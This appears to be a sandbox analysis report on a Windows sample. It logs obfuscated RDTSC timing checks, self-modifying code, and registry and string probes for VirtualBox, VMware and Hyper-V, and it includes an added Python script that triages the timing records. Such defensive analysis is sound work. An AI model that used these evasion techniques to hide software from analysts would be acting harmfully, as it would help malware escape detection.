Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B2D second address: 71B0B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov ax, di 0x0000000b mov bh, D4h 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FCBA141FCADh 0x00000019 sbb ax, 0136h 0x0000001e jmp 00007FCBA141FCB1h 0x00000023 popfd 0x00000024 mov dh, al 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B68 second address: 71B0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B6E second address: 71B0B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0B72 second address: 71B0BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA141C937h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0BA8 second address: 71B0BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 pushfd 0x00000013 jmp 00007FCBA141FCAFh 0x00000018 jmp 00007FCBA141FCB3h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220616 second address: 7220650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 jmp 00007FCBA141C937h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220650 second address: 7220656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7220656 second address: 722065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 722065A second address: 72206AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FCBA141FCB7h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov edi, eax 0x00000013 jmp 00007FCBA141FCB0h 0x00000018 popad 0x00000019 mov dl, byte ptr [ebp+14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCBA141FCB7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72206AC second address: 72206B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72206B2 second address: 72206B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72206B6 second address: 7220710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f call 00007FCBA141C934h 0x00000014 movzx eax, dx 0x00000017 pop edi 0x00000018 pushfd 0x00000019 jmp 00007FCBA141C92Ch 0x0000001e jmp 00007FCBA141C935h 0x00000023 popfd 0x00000024 popad 0x00000025 and dl, 00000007h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7220710 second address: 7220714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7220714 second address: 7220718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7220718 second address: 722071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 722071E second address: 7220744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBA141C92Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7220744 second address: 722074A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 722074A second address: 722077B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCC117323BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBA141C937h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 722077B second address: 7220781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7220781 second address: 72207B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d pushad 0x0000000e mov ax, 3E49h 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 mov eax, ebx 0x00000018 popad 0x00000019 popad 0x0000001a inc ecx 0x0000001b jmp 00007FCBA141C933h 0x00000020 shr eax, 1 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72207B6 second address: 72207BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200E3A second address: 7200E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 jmp 00007FCBA141C92Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA141C937h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200E68 second address: 7200E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200E6E second address: 7200E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200E72 second address: 7200E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA141FCB8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200E97 second address: 7200E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200E9D second address: 7200EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop ecx 0x0000000f pushfd 0x00000010 jmp 00007FCBA141FCB9h 0x00000015 xor eax, 0AD40F76h 0x0000001b jmp 00007FCBA141FCB1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200EE8 second address: 7200EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200EEE second address: 7200EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200EF2 second address: 7200F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FCBA141C92Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCBA141C930h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7200F20 second address: 7200F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72104E1 second address: 72104E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72104E7 second address: 72104EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72104EB second address: 72105D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, al 0x0000000f mov bx, 8F2Ch 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FCBA141C92Bh 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FCBA141C936h 0x00000021 push eax 0x00000022 jmp 00007FCBA141C92Bh 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 mov ax, DFCBh 0x0000002d movzx esi, dx 0x00000030 popad 0x00000031 push ebp 0x00000032 jmp 00007FCBA141C938h 0x00000037 mov dword ptr [esp], esi 0x0000003a jmp 00007FCBA141C930h 0x0000003f mov esi, dword ptr [ebp+08h] 0x00000042 jmp 00007FCBA141C930h 0x00000047 sub ecx, ecx 0x00000049 pushad 0x0000004a call 00007FCBA141C937h 0x0000004f mov dx, si 0x00000052 pop eax 0x00000053 push edx 0x00000054 pushfd 0x00000055 jmp 00007FCBA141C930h 0x0000005a sub ah, FFFFFFF8h 0x0000005d jmp 00007FCBA141C92Bh 0x00000062 popfd 0x00000063 pop eax 0x00000064 popad 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FCBA141C92Eh 0x0000006f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72105D8 second address: 72105DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 72105DE second address: 7210647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c jmp 00007FCBA141C930h 0x00000011 mov eax, 00000001h 0x00000016 jmp 00007FCBA141C930h 0x0000001b lock cmpxchg dword ptr [esi], ecx 0x0000001f jmp 00007FCBA141C930h 0x00000024 mov ecx, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FCBA141C937h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D023E second address: 71D0244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D0244 second address: 71D0248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D0248 second address: 71D027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dl, ch 0x0000000c pushfd 0x0000000d jmp 00007FCBA141FCABh 0x00000012 jmp 00007FCBA141FCB3h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d movzx esi, di 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D027C second address: 71D02F3 instructions: 0x00000000 rdtsc 0x00000002 mov di, C452h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FCBA141C933h 0x0000000e jmp 00007FCBA141C933h 0x00000013 popfd 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 jmp 00007FCBA141C934h 0x0000001d mov ecx, 37956161h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 jmp 00007FCBA141C92Ch 0x0000002b and dword ptr [eax], 00000000h 0x0000002e jmp 00007FCBA141C930h 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D02F3 second address: 71D02F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D02F7 second address: 71D02FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D002E second address: 71D0034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D0034 second address: 71D0095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCBA141C92Ch 0x00000013 and eax, 2EA976C8h 0x00000019 jmp 00007FCBA141C92Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FCBA141C938h 0x00000025 or esi, 14C7F928h 0x0000002b jmp 00007FCBA141C92Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D0095 second address: 71D00DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141FCAFh 0x00000009 sub al, 0000006Eh 0x0000000c jmp 00007FCBA141FCB9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FCBA141FCADh 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D00DE second address: 71D00E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D00E2 second address: 71D00E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D00E6 second address: 71D00EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D00EC second address: 71D00F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D00F2 second address: 71D00F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 71D00F6 second address: 71D00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 716012B second address: 7160130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 7160130 second address: 716017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA141FCB1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FCBA141FCAEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b mov ah, 8Bh 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov bh, ah 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | RDTSC instruction interceptor: First address: 716017B second address: 7160180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
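The records above are what the sandbox logged between pairs of intercepted RDTSC instructions. Almost every one is a push/pop or pushad/popad shuffle around the read, the pattern of an obfuscator spilling and restoring EDX:EAX around decoy reads, so the raw interceptor count says little about whether the sample ever compares two readings. The following Python script is an added example, not Joe Sandbox tooling: it parses records in exactly the format printed above, tags EDX:EAX after the first RDTSC, follows the tag through registers, stack and flags up to the second RDTSC, and reports whether the reading was thrown away (decoy), carried out of the record (live), or fed a conditional branch or a memory store (consumed). The three REPORT_RECORDS are copied verbatim from this section; the two-record pair under CONSTRUCTED_CHECK, with its 401000-range addresses, is made up here to show what a genuine delta-and-compare looks like. The model treats partial-register writes as full writes and stack slots a record did not push itself as unknown, so "decoy" is a strong hint rather than proof; "consumed" is the verdict to trust.

```python
"""Triage Joe Sandbox "RDTSC instruction interceptor" records (added example).
EDX:EAX is tagged CTR after the first RDTSC; the tag is followed through registers,
stack and flags until the second RDTSC. Errs towards 'decoy' (see lead-in)."""
import re

CTR, OTHER = "CTR", "OTHER"
GPR = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # pushad order
SUBREG = {s: r for r in GPR[:4] for s in (r[1:], r[1] + "l", r[1] + "h")}
SUBREG.update(sp="esp", bp="ebp", si="esi", di="edi")
ALU = {"add", "sub", "adc", "sbb", "and", "or", "xor", "shl", "shr", "sar", "rol", "ror", "imul"}
JCC = re.compile(r"^j(?!mp$)[a-z]{1,3}$")  # je, jne, ja, jbe ... but not jmp
RECORD = re.compile(r"First address:\s*(\w+)\s+second address:\s*(\w+)\s+instructions:\s*(.*)$")
OFFSET = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")  # the "0x0000000e " before each instruction


def parse_record(line):
    """Return (first, second, [(mnemonic, [operands]), ...]) for one report line."""
    m = RECORD.search(line)
    if not m:
        raise ValueError("not an RDTSC interceptor record")
    insns = []
    for text in filter(None, (t.strip() for t in OFFSET.split(m.group(3)))):
        mn, _, rest = text.partition(" ")
        insns.append((mn.lower(), [o.strip() for o in rest.split(",")] if rest else []))
    return m.group(1), m.group(2), insns


def _reg(op):
    op = op.lower()
    return op if op in GPR else SUBREG.get(op)


def classify(line):
    """'consumed', 'live' or 'decoy' for one interceptor record."""
    _, _, insns = parse_record(line)
    if not insns or insns[0][0] != "rdtsc":
        raise ValueError("record must start with rdtsc")
    body = insns[1:-1] if insns[-1][0] == "rdtsc" else insns[1:]
    regs, stack, flags, observed = dict.fromkeys(GPR, OTHER), [], OTHER, False
    regs["eax"] = regs["edx"] = CTR                          # the first RDTSC
    tag = lambda op: regs[_reg(op)] if _reg(op) else OTHER    # imm/memory: OTHER
    pop = lambda: stack.pop() if stack else OTHER             # unknown slot: OTHER
    for mn, ops in body:
        tags = [tag(o) for o in ops]
        mixed = CTR if CTR in tags else OTHER
        if mn == "push":
            stack.append(tags[0])
        elif mn == "pop":
            t, r = pop(), _reg(ops[0])
            if r:
                regs[r] = t
        elif mn == "pushad":
            stack.extend(regs[r] for r in GPR)
        elif mn == "popad":                                   # saved ESP slot is irrelevant to tags
            regs.update(zip(reversed(GPR), [pop() for _ in GPR]))
        elif mn == "pushfd":
            stack.append(flags)
        elif mn == "popfd":
            flags = pop()
        elif mn == "call":
            stack.append(OTHER)                               # return address
        elif JCC.match(mn):
            observed |= flags == CTR                          # branch decided by the counter
        elif mn in ("mov", "movzx", "movsx", "xchg"):
            dst, src = _reg(ops[0]), _reg(ops[1])
            if mn == "xchg" and dst and src:
                regs[dst], regs[src] = regs[src], regs[dst]
            elif dst:
                regs[dst] = tags[1]
            elif tags[1] == CTR:
                observed = True                               # counter stored to memory
        elif mn in ALU:
            dst = _reg(ops[0])
            if mn in ("xor", "sub") and dst and dst == _reg(ops[1]):
                mixed = OTHER                                 # zeroing idiom
            if dst:
                regs[dst] = mixed
            flags = mixed
        elif mn in ("cmp", "test", "inc", "dec", "neg", "not"):
            flags = mixed
        # jmp, nop and unmodelled instructions leave the state unchanged
    if observed:
        return "consumed"
    if CTR in regs.values() or CTR in stack or flags == CTR:
        return "live"
    return "decoy"


# Three records copied verbatim from the report section above.
REPORT_RECORDS = [
    "RDTSC instruction interceptor: First address: 72206AC second address: 72206B2 instructions: "
    "0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    "RDTSC instruction interceptor: First address: 72206B2 second address: 72206B6 instructions: "
    "0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 7200E3A second address: 7200E68 instructions: "
    "0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 jmp 00007FCBA141C92Ch 0x0000000a popad "
    "0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx "
    "0x00000010 jmp 00007FCBA141C937h 0x00000015 rdtsc",
]
# Constructed pair (addresses invented): keep the first reading, subtract, compare, branch.
CONSTRUCTED_CHECK = [
    "RDTSC instruction interceptor: First address: 401000 second address: 401006 instructions: "
    "0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 401006 second address: 401014 instructions: "
    "0x00000000 rdtsc 0x00000002 sub eax, ecx 0x00000004 cmp eax, 00000500h 0x00000009 ja 00401100h 0x0000000f rdtsc",
]
```

Running classify over every record of this section is the quickest way to see how many of the interceptor hits deserve a manual look: a "live" record means the reading left through the stack or a register and the comparison, if there is one, sits outside the intercepted window, while a run of "decoy" verdicts is the obfuscator's noise.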
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Special instruction interceptor: First address: B31976 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Special instruction interceptor: First address: B31882 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Special instruction interceptor: First address: CF6992 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Special instruction interceptor: First address: CD89E8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Special instruction interceptor: First address: B318DF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Special instruction interceptor: First address: D5D571 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc ({4d36e968-...} is the display adapter device class; the driver description names the GPU, which is a virtual adapter under VirtualBox, VMware or Hyper-V)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00639980 rdtsc 0_2_00639980
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0045255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0045255D
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_004529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004529FF
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: EwhnoHx0n5.exe | Binary or memory string: Hyper-V RAW
